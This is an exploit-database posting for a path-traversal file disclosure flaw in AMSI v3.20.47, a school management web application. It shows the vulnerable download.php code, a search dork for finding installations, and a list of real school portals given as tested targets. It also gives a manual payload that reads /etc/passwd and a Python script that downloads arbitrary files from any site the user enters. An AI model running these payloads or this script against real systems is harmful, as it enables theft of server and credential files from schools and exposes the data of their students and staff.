AMSI 3.20.47 Build 37 File Disclosure



EKU-ID: 4461 CVE: OSVDB-ID:
Author: KnocKout Published: 2014-12-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


                .__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/
                         _____________________________ 
                        /   _____/\_   _____/\_   ___ \
                        \_____  \  |    __)_ /    \  \/  
                        /        \ |        \\     \____
                       /_______  //_______  / \______  /
                               \/         \/         \/           
AMSI v3.20.47 build 37 <= Remote File Disclosure Exploit (.py)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] Exploit Developed by : B3mB4m
[~] HomePage :  http://h4x0resec.blogspot.com
[~] Guzel Insanlar :  ZoRLu, ( milw00rm.com ), 
                      Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, 
                      DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : AMSI ( Academia management solutions international )
|~Affected Version : v3.20.47 build 37
|~Software  : http://amsi.ae - http://iconnect.ae
|~RISK : Medium
|~Google Keyword/Dork :  inurl:"?load=news/search_news"
|~Tested On : [L] Kali Linux \ [R] example sites
####################INFO################################
makes it possible to read all the files from the local base.
 #######################################################
 
### Error Line in 'download.php' ## 
 
..
    $path   =   str_replace('/download.php?file=','',$_SERVER['REQUEST_URI']);   
    // $path = $_GET['file']; 
    header("Content-Description: File Transfer");
    header("Content-Type: application/force-download");
    //header("Content-Disposition: attachment; filename=" . basename($path . $uri[1]));
    header("Content-Disposition: attachment; filename=\"" . basename($path . $uri[1]) . "\"" );

    @readfile($path);
..
########################################################
Example and tested on;
 
http://portal.iconnect.ae/
http://demo.iconnect.ae/
http://barsha.almawakeb.sch.ae/
http://portal.naischool.ae/
http://portal.ias-dubai.ae/
http://portal.madarschool.ae/
http://portal.isas.sch.ae/
http://portal.alsanawbarschool.com/
http://fia.fischools.com/
http://portal.ajyal.sch.ae/
http://portal.arabunityschool.com/
http://alnashaa.sch.ae/
http://portal.aaess.com/
 
############################################################
Manual Exploitation; http://$VICTIM/download.php?file=../../../../etc/passwd
############################################################
=========Automatic File Source Downloader Exploit ========
##################### exploit.py ##############################

# Coded by b3mb4m 
 
import random
import os
import urllib

class B3mB4m(object):
	def example(self):
		print """

		How to use ? 
			Website:  http://VICTIM.com
			Path : /download.php?file=../../../../etc/passwd
		"""	
		
	def exploit(self):
		ask = raw_input("Website :")
		uz = raw_input("Path : ")

		#ask = "http://alnashaa.sch.ae"
		#uz = "/download.php?file=../../../../etc/passwd"

		uniq = str(random.randrange(1,1000+1))+".txt"
		filee = ask+uz

		try:
			urllib.urlretrieve(filee, uniq); 
			print "\t\nDownload complate ! "
			os.startfile(uniq)
		except:
			B3mB4m().example()	


if __name__ == '__main__':
	B3mB4m().exploit()